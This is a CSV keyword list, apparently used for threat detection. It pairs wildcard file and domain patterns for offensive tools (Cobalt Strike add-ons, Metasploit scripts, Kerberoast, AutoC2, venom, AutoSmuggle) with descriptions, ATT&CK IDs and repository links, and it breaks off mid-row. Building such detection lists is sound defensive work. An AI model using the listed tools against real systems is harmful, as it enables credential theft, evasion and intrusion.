Access,https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Anti-Forensics.md,1,0,N/A,N/A,9,890,121,2023-10-03T19:54:40Z,2021-08-16T17:34:25Z -*Auditcleaner.*,offensive_tool_keyword,EQGRP tools,Equation Group hack tool leaked by ShadowBrokers anti forensic - cleans up audit.log,T1055 - T1036 - T1038 - T1203 - T1059,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/Artogn/EQGRP-1/blob/master/Linux/bin/Auditcleaner,1,0,N/A,N/A,1,0,1,2017-04-10T05:02:35Z,2017-04-10T06:59:29Z -*Augustus-main.zip*,offensive_tool_keyword,Augustus,Augustus is a Golang loader that execute shellcode utilizing the process hollowing technique with anti-sandbox and anti-analysis measures. 
The shellcode is encrypted with the Triple DES (3DES) encryption algorithm.,T1055.012 - T1027.002 - T1136.001 - T1562.001,TA0005 - TA0002 - TA0003,N/A,N/A,Exploitation tools,https://github.com/TunnelGRE/Augustus,1,1,N/A,6,2,107,23,2023-08-27T10:37:51Z,2023-08-21T15:08:40Z -*ausecwa/bof-registry*,offensive_tool_keyword,cobaltstrike,Cobalt Strike beacon object file that allows you to query and make changes to the Windows Registry,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/ausecwa/bof-registry,1,1,N/A,10,10,17,7,2021-02-11T04:38:28Z,2021-01-29T05:07:47Z -*auth/cc2_ssh.*,offensive_tool_keyword,cobaltstrike,CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. 
thereby extending the functionality of Cobalt Strike.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CrossC2/CrossC2Kit,1,1,N/A,10,10,155,25,2023-08-08T19:52:07Z,2022-06-06T07:00:10Z -*auto_brute.rc*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*auto_exploit_blank_password*,offensive_tool_keyword,pxethief,PXEThief is a set of tooling that can extract passwords from the Operating System Deployment functionality in Microsoft Endpoint Configuration Manager,T1555.004 - T1555.002,TA0006,N/A,N/A,Credential Access,https://github.com/MWR-CyberSec/PXEThief,1,1,N/A,N/A,3,220,27,2023-05-18T19:55:17Z,2022-08-12T22:16:46Z -*auto_pass_the_hash.*,offensive_tool_keyword,viperc2,vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/FunnyWolf/vipermsf,1,1,N/A,N/A,1,78,37,2023-09-28T08:36:47Z,2021-01-20T13:08:24Z -*auto_pass_the_hash.rc*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*auto_target_linux.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*auto_target_windows.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. 
and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*autobloody -*,offensive_tool_keyword,autobloody,Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound,T1078 - T1078.003 - T1021 - T1021.006 - T1076.001,TA0005 - TA0001 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/CravateRouge/autobloody,1,0,N/A,10,4,330,38,2023-09-01T06:41:34Z,2022-09-07T13:34:30Z -*autobloody.py*,offensive_tool_keyword,autobloody,Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound,T1078 - T1078.003 - T1021 - T1021.006 - T1076.001,TA0005 - TA0001 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/CravateRouge/autobloody,1,1,N/A,10,4,330,38,2023-09-01T06:41:34Z,2022-09-07T13:34:30Z -*autobloody-main*,offensive_tool_keyword,autobloody,Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound,T1078 - T1078.003 - T1021 - T1021.006 - T1076.001,TA0005 - TA0001 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/CravateRouge/autobloody,1,1,N/A,10,4,330,38,2023-09-01T06:41:34Z,2022-09-07T13:34:30Z -*AutoBypass.ps1*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z 
-*AutoC2.sh*,offensive_tool_keyword,AutoC2,AutoC2 is a bash script written to install all of the red team tools that you know and love,T1059.004 - T1129 - T1486,TA0005 - TA0002 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2,1,1,N/A,10,4,348,73,2023-09-30T13:40:08Z,2022-03-23T15:52:41Z -*AutoC2/All.sh*,offensive_tool_keyword,AutoC2,AutoC2 is a bash script written to install all of the red team tools that you know and love,T1059.004 - T1129 - T1486,TA0005 - TA0002 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2,1,0,N/A,10,4,348,73,2023-09-30T13:40:08Z,2022-03-23T15:52:41Z -*AutoC2/C2*,offensive_tool_keyword,AutoC2,AutoC2 is a bash script written to install all of the red team tools that you know and love,T1059.004 - T1129 - T1486,TA0005 - TA0002 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2,1,1,N/A,10,4,348,73,2023-09-30T13:40:08Z,2022-03-23T15:52:41Z -*AutoC2/Dependencies*,offensive_tool_keyword,AutoC2,AutoC2 is a bash script written to install all of the red team tools that you know and love,T1059.004 - T1129 - T1486,TA0005 - TA0002 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2,1,1,N/A,10,4,348,73,2023-09-30T13:40:08Z,2022-03-23T15:52:41Z -*AutoC2/Initial_Access*,offensive_tool_keyword,AutoC2,AutoC2 is a bash script written to install all of the red team tools that you know and love,T1059.004 - T1129 - T1486,TA0005 - TA0002 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2,1,1,N/A,10,4,348,73,2023-09-30T13:40:08Z,2022-03-23T15:52:41Z -*AutoC2/Lateral.sh*,offensive_tool_keyword,AutoC2,AutoC2 is a bash script written to install all of the red team tools that you know and love,T1059.004 - T1129 - T1486,TA0005 - TA0002 - TA0040,N/A,N/A,Exploitation 
Tools,https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2,1,0,N/A,10,4,348,73,2023-09-30T13:40:08Z,2022-03-23T15:52:41Z -*AutoC2/Payload_Development*,offensive_tool_keyword,AutoC2,AutoC2 is a bash script written to install all of the red team tools that you know and love,T1059.004 - T1129 - T1486,TA0005 - TA0002 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2,1,1,N/A,10,4,348,73,2023-09-30T13:40:08Z,2022-03-23T15:52:41Z -*AutoC2/Recon*,offensive_tool_keyword,AutoC2,AutoC2 is a bash script written to install all of the red team tools that you know and love,T1059.004 - T1129 - T1486,TA0005 - TA0002 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2,1,1,N/A,10,4,348,73,2023-09-30T13:40:08Z,2022-03-23T15:52:41Z -*AutoC2/Situational_Awareness*,offensive_tool_keyword,AutoC2,AutoC2 is a bash script written to install all of the red team tools that you know and love,T1059.004 - T1129 - T1486,TA0005 - TA0002 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2,1,1,N/A,10,4,348,73,2023-09-30T13:40:08Z,2022-03-23T15:52:41Z -*AutoC2/Social.sh*,offensive_tool_keyword,AutoC2,AutoC2 is a bash script written to install all of the red team tools that you know and love,T1059.004 - T1129 - T1486,TA0005 - TA0002 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2,1,0,N/A,10,4,348,73,2023-09-30T13:40:08Z,2022-03-23T15:52:41Z -*AutoC2/Staging*,offensive_tool_keyword,AutoC2,AutoC2 is a bash script written to install all of the red team tools that you know and love,T1059.004 - T1129 - T1486,TA0005 - TA0002 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2,1,1,N/A,10,4,348,73,2023-09-30T13:40:08Z,2022-03-23T15:52:41Z -*AutoC2/Web.sh*,offensive_tool_keyword,AutoC2,AutoC2 is a bash script written to 
install all of the red team tools that you know and love,T1059.004 - T1129 - T1486,TA0005 - TA0002 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2,1,0,N/A,10,4,348,73,2023-09-30T13:40:08Z,2022-03-23T15:52:41Z -*AutoC2/Wireless.sh*,offensive_tool_keyword,AutoC2,AutoC2 is a bash script written to install all of the red team tools that you know and love,T1059.004 - T1129 - T1486,TA0005 - TA0002 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2,1,0,N/A,10,4,348,73,2023-09-30T13:40:08Z,2022-03-23T15:52:41Z -*AutoC2/Wordlists*,offensive_tool_keyword,AutoC2,AutoC2 is a bash script written to install all of the red team tools that you know and love,T1059.004 - T1129 - T1486,TA0005 - TA0002 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2,1,1,N/A,10,4,348,73,2023-09-30T13:40:08Z,2022-03-23T15:52:41Z -*AutoCompletionHandlerC2ServerManager*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*autodiscover/brute.go*,offensive_tool_keyword,ruler,A tool to abuse Exchange services,T1102.001 - T1201.001 - T1570.002,TA0006,N/A,N/A,Exploitation tools,https://github.com/sensepost/ruler,1,1,N/A,N/A,10,1991,353,2021-02-19T09:28:07Z,2016-08-18T15:05:13Z -*autoexploit.rc*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*autokerberoast.ps1*,offensive_tool_keyword,kerberoast,Kerberoast is a series of tools for attacking MS Kerberos implementations,T1550 - T1555 - T1212 - T1558,TA0001 - TA0004 - TA0006,N/A,N/A,Credential Access,https://github.com/xan7r/kerberoast,1,1,N/A,N/A,1,71,20,2017-07-22T22:28:12Z,2016-06-08T22:58:45Z -*autokerberoast_noMimikatz.ps1,offensive_tool_keyword,kerberoast,Kerberoast is a series of tools for attacking MS Kerberos implementations,T1550 - T1555 - T1212 - T1558,TA0001 - TA0004 - TA0006,N/A,N/A,Credential Access,https://github.com/xan7r/kerberoast,1,1,N/A,N/A,1,71,20,2017-07-22T22:28:12Z,2016-06-08T22:58:45Z -*autoKirbi2hashcat.py*,offensive_tool_keyword,kerberoast,Kerberoast is a series of tools for attacking MS Kerberos implementations,T1550 - T1555 - T1212 - T1558,TA0001 - TA0004 - TA0006,N/A,N/A,Credential Access,https://github.com/xan7r/kerberoast,1,1,N/A,N/A,1,71,20,2017-07-22T22:28:12Z,2016-06-08T22:58:45Z -*autolace.twilightparadox.com*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,1,can be used for data exfiltration 
simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*automachine.servequake.com*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,1,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*AutoNSE*,offensive_tool_keyword,autonse,Massive NSE (Nmap Scripting Engine) AutoSploit and AutoScanner. The Nmap Scripting Engine (NSE) is one of Nmaps most powerful and flexible features. It allows users to write (and share) simple scripts (using the Lua programming language ) to automate a wide variety of networking tasks. Those scripts are executed in parallel with the speed and efficiency you expect from Nmap. Users can rely on the growing and diverse set of scripts distributed with Nmap. or write their own to meet custom needs. For more informations https://nmap.org/book/man-nse.html,T1059.001 - T1059.003 - T1059.005 - T1059.006 - T1027 - T1064 - T1086 - T1085,TA0002 - TA0003 - TA0009,N/A,N/A,Exploitation tools,https://github.com/m4ll0k/AutoNSE,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*autopwn*,offensive_tool_keyword,autopwn,tools for pentester. autopwn is designed to make a pentesters life easier and more consistent by allowing them to specify tools they would like to run against targets. without having to type them in a shell or write a script. 
This tool will probably be useful during certain exams as well..,T1583 - T1059 - T1216 - T1053 - T1027,TA0002 - TA0008 - TA0003,N/A,N/A,Exploitation tools,https://github.com/nccgroup/autopwn,1,1,N/A,N/A,4,375,102,2019-04-23T09:58:28Z,2015-02-23T08:18:01Z -*AutoRDPwn*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*AutoSmuggle.csproj*,offensive_tool_keyword,AutoSmuggle,Utility to craft HTML or SVG smuggled files for Red Team engagements,T1027.006 - T1598,TA0005 - TA0043,N/A,N/A,Defense Evasion,https://github.com/surajpkhetani/AutoSmuggle,1,1,N/A,9,2,141,21,2023-09-02T08:09:50Z,2022-03-20T19:02:06Z -*AutoSmuggle.exe*,offensive_tool_keyword,AutoSmuggle,Utility to craft HTML or SVG smuggled files for Red Team engagements,T1027.006 - T1598,TA0005 - TA0043,N/A,N/A,Defense Evasion,https://github.com/surajpkhetani/AutoSmuggle,1,1,N/A,9,2,141,21,2023-09-02T08:09:50Z,2022-03-20T19:02:06Z -*AutoSmuggle.sln*,offensive_tool_keyword,AutoSmuggle,Utility to craft HTML or SVG smuggled files for Red Team engagements,T1027.006 - T1598,TA0005 - TA0043,N/A,N/A,Defense Evasion,https://github.com/surajpkhetani/AutoSmuggle,1,1,N/A,9,2,141,21,2023-09-02T08:09:50Z,2022-03-20T19:02:06Z -*AutoSmuggle-master*,offensive_tool_keyword,AutoSmuggle,Utility to craft HTML or SVG smuggled files for Red Team engagements,T1027.006 - T1598,TA0005 - TA0043,N/A,N/A,Defense Evasion,https://github.com/surajpkhetani/AutoSmuggle,1,1,N/A,9,2,141,21,2023-09-02T08:09:50Z,2022-03-20T19:02:06Z -*autostart/ares.desktop*,offensive_tool_keyword,Ares,Python C2 botnet and backdoor ,T1105 - T1102 - T1055,TA0003 - TA0002 - 
TA0007,N/A,N/A,C2,https://github.com/sweetsoftware/Ares,1,0,N/A,10,10,1439,523,2023-03-02T12:43:09Z,2015-10-18T12:26:27Z -*autoTGS_NtlmCrack.py*,offensive_tool_keyword,kerberoast,Kerberoast is a series of tools for attacking MS Kerberos implementations,T1550 - T1555 - T1212 - T1558,TA0001 - TA0004 - TA0006,N/A,N/A,Credential Access,https://github.com/xan7r/kerberoast,1,1,N/A,N/A,1,71,20,2017-07-22T22:28:12Z,2016-06-08T22:58:45Z -*autotimeline *,offensive_tool_keyword,autotimeliner,Automagically extract forensic timeline from volatile memory dumps.,T1547 - T1057 - T1003,TA0005 - TA0008,N/A,N/A,Forensic Exploitation tools,https://github.com/andreafortuna/autotimeliner,1,0,N/A,N/A,2,119,23,2023-03-17T07:29:34Z,2018-11-12T16:13:32Z -*autotimeline.py*,offensive_tool_keyword,autotimeliner,Automagically extract forensic timeline from volatile memory dumps.,T1547 - T1057 - T1003,TA0005 - TA0008,N/A,N/A,Forensic Exploitation tools,https://github.com/andreafortuna/autotimeliner,1,1,N/A,N/A,2,119,23,2023-03-17T07:29:34Z,2018-11-12T16:13:32Z -*autotimeliner.git*,offensive_tool_keyword,autotimeliner,Automagically extract forensic timeline from volatile memory dumps.,T1547 - T1057 - T1003,TA0005 - TA0008,N/A,N/A,Forensic Exploitation tools,https://github.com/andreafortuna/autotimeliner,1,1,N/A,N/A,2,119,23,2023-03-17T07:29:34Z,2018-11-12T16:13:32Z -*aux/dump_credentials*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*aux/enum_system.rc*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation 
tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*aux/msf/*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*aux/persistence.rc,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*aux/privilege_escalation.*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*aux/Start-Webserver.ps1*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*auxiliary/crawler*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*auxiliary/sqli/*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*av_hips_executables.txt*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. 
and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*avast_memory_dump.md*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*avet-master.zip*,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. 
